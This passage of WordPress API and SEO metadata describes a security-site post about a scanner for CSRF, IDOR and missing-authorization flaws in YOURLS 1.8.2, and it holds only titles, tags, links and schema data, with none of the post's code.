redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29324","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540 - zero redgem","og_description":"{“lastseen”:”2025-12-08T16:29:00″,”description”:”YOURLS version 1.8.2 AJAX endpoint scanner that checks for cross site request forgery, insecure direct object reference, missing authorization, and missing input validation vulnerabilities…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 YOURLS...","og_url":"https:\/\/zero.redgem.net\/?p=29324","og_site_name":"zero redgem","article_published_time":"2025-12-08T10:42:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29324#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29324"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540","datePublished":"2025-12-08T10:42:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29324"},"wordCount":3061,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.4","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29324#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29324","url":"https:\/\/zero.redgem.net\/?p=29324","name":"\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-08T10:42:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29324#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29324"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29324#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29324"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29324\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29324"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}